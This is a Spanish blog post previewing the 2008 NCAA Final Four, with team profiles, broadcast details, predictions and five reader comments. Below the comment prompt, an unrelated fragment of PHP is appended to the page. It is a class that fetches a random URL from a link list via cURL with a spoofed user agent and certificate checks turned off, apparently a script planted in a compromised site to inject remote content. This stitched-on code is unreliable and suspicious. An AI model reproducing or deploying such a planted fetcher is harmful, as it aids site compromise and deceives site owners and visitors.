Previa de la NCAA Final Four

02 de April de 2008 por Dantley

El próximo fin de semana en San Antonio, por primera vez en la historia de la Final Four se enfrentarán los cuatro cabezas de serie de la NCAA. UCLA, Memphis, Kansas y North Carolina conforman un cartel impresionante para unas finales que presentan su candidatura a ser una de las mejores de todos los tiempos.

HORARIOS

UCLA-Memphis: Sábado 5 de abril. 00:07 Hora española (madrugada del sábado al domingo)

Kansas-North Carolina: Sábado 5 de abril. 02:47 Hora española (madrugada del sábado al domingo)

Final:: Lunes 7 de abril. 03:11 Hora española (madrugada del lunes al martes)

¿DÓNDE PUEDE VERSE?

Puede verse de forma gratuita en la dirección: http://www.ncaasports.com/mmod donde también se pueden encontrar el resto de partidos de la March Madness en diferido.

En Canal+ podrán verse las semifinales y la final en directo. Durante estos días Canal+ Deportes y Sportmanía están ofreciendo partidos de la competición de este año. Canal+ Eventos durante el fin de semana tendrá un programa especial con el mejor basket universitario de la historia.

LOS EQUIPOS

MEMPHIS

El equipo de Tennessee es el que llega a San Antonio con el mejor balance de victorias y derrotas. Sólo ha perdido 1 de los 38 partidos disputados este año. Sus críticos dicen que la competencia que han tenido ha sido de menor nivel que el resto de finalistas, pero nadie puede negar el talento que acumula Memphis, un equipo que juega basándose en sus individualidades capaces de romper cualquier partido.

La estrella: Derrick Rose. Es el jugador que tiene más potencial de estrella de todos cuantos estarán en San Antonio este fin de semana. Un base con un gran físico para su posición y excepcional manejo de balón. Todavía le queda mucho que aprender en la distribución de juego, pero tiene condiciones para ser un futuro All-Star en la NBA.

A seguir: Joey Dorsey: Una bestia defensiva que da balance al equipo. Chris Douglas-Roberts: El típico small forward capaz de hacer bien todas las pequeñas cosas.

Historia: Memphis ha alcanzado dos Final Four

UCLA

UCLA repite Final Four con urgencias históricas para uno de los grandes con ya demasiados años sin ganar el campeonato. El entrenador Howland ha sabido hacer un equipo muy solidario en defensa y capaz de cortocircuitar las ideas del rival. UCLA estrangula poco a poco en defensa mientras en ataque saca fruto de la capacidad de sus estrellas para ganar los partidos con asombrosa solvencia.

La estrella: Kevin Love. Puro baloncesto. Alero alto, separado por un par de pulgadas de ser un número 1 del draft, Love es probablemente el jugador que mejor entiende el juego del baloncesto de la liga universitaria. Juega sensacionalmente de espaldas a canasta, tiene un muy buen tiro de media distancia y es un pasador brillante. En defensa sabe aprovechar esos kilos de más para ganar rebotes por pura inteligencia. Su duelo en semifinales con el tosco Dorsey puede ser sensacional.

A seguir: Russell Westbrook / Darren Collison. Magnífica pareja exterior que se complementa perfectamente. Más fino y excepcional triplista Collison, más atlético y penetrador Westbrook.

Historia: 11 campeonatos contemplan a los Bruins. La Final Four de San Antonio es la tercera consecutiva.

NORTH CAROLINA

North Carolina es capaz de ganar partidos que van a 100 puntos y partidos que van a 60. Equipo muy compensado en ambos lados de la cancha. Sus jugadores practican un baloncesto de muy alto nivel y con gran riqueza táctica apoyada en el talento de Lawson y Hansbrough. En el lado negativo, su banquillo es débil y le faltan centímetros.

La estrella: Tyler Hansbrough. Alero alto escaso de centímetros pero con un talento puro cerca del aro. Carece de tiro exterior, pero su arsenal de movimientos en ataque parece ilimitado. Lleva tres años a un nivel muy regular. Competidor nato y buen defensor.

A seguir: Ty Lawson: Base muy liviano, rapidísimo y con muy buena distribución de juego especialmente en el contraataque. Wayne Ellington: Escolta clásico capaz de aportar el tiro exterior que le de espacios a Hansbrough.

Historia: Los Tar Heels han ganado 4 campeonatos y jugado 16 Final Four.

KANSAS

Kansas es el equipo que más ha sufrido en el último partido. Como decía su entrenador Bill Self, más que alegría tras la apretada victoria frente a Davidson, sintió alivio. El sábado sabremos si dicha circunstancia les libera de presión o por el contrario les quita confianza en sí mismos. De los 4 equipos que se verán las caras, Kansas University es el que tiene más profundidad de banquillo, lo que le permite plantear los partidos con defensas muy intensas.

La estrella: Ninguna. Kansas destaca precisamente por tener una plantilla muy compensada con gran variedad de posibilidades.

A seguir: Darrell Arthur: Alero alto, buen defensor y con buenas aptitudes en ataque aunque inconsistente. Brandon Rush: Gran tirador exterior que parece haber superado una grave lesión de rodilla. Mario Chalmers: Por debajo de otros bases del torneo, pero Chalmers es un buen tirador exterior y un más que aceptable pasador.

Historia: Los Jayhwaks han conseguido 2 campeonatos y participado en 12 Final Four

EL PRONÓSTICO

Memphis-UCLA: Talento físico vs talento mental. Memphis se ha mostrado casi imbatible y tienen al anti-Love en Dorsey. Derrick Rose hará valer su calidad.

Kansas-North Carolina: Profundidad de banquillo vs Equipo compacto. North Carolina ha demostrado mucha fortaleza mental.

Final: Memphis-North Carolina. Difícil pronóstico nuevamente, pero si hay un equipo que se le puede atrangantar a Memphis, esos son los Tar Heels. Nuestros favoritos son los Tar Heels con Hansbrough y Lawson disputándose el MVP.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Anda que no me lo voy a pasar bien viendolo por el digital!!! Ese UCLA-Memphis puede ser histórico.

      Citar

  2. Gallis dice:
    #2

    No sé yo si Magic estará muy de acuerdo con eso de que “nuestros” favoritos son los Tar Heels…

    Pero, eh, me lo he leído enterito. Creo que voy a dejar de vender rondas, jeje…

      Citar

  3. Dantley dice:
    #3

    Te lo digo de otra manera, “donde yo pondría el dinero para apostar” sería en los Tar Heels, pero la verdad es que está todo igualadísimo. La expectación parece que puede llevar esta Final Four a ser de las más vistas en televisión.

    Lo de las rondas, Gallis, es curioso. Para mí los dos mejores jugadores son Kevin Love y Tyler Hansbrough, pero sin embargo Derrick Rose podría ser número 1 del draft y Hansbrough es posible (espero que no) que no sea ni de lotería. Es la discusión que tenía con Drheam, la NCAA y la NBA son dos animales distintos. Cierto es que Rose tiene más margen de progresión, pero mientras Love y Hansbrough dominan claramente cada partido en la NCAA, en la NBA hay demasiadas bestias pardas sobre las que no van a poder dominar.

    Ahora, ojito a Rose. En el artículo hablo de All Star, pero vamos, que puede ser un crack del nivel de Chris Paul (o quedarse en la medianía que se ha quedado Marbury)

      Citar

  4. Viva_Dirk dice:
    #4

    Hombre, Marbury durante la mayoría de años de su carrera ha sido una estrella de la liga, ahora mismo está en horas bajas….y en los Knicks, jojo.

    Pero si Rose llega al nivel de Marbury es que habrá sido All-Star varias veces.

      Citar

  5. Dantley dice:
    #5

    Obviamente me refiero al Marbury actual. El antiguo era un crack

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>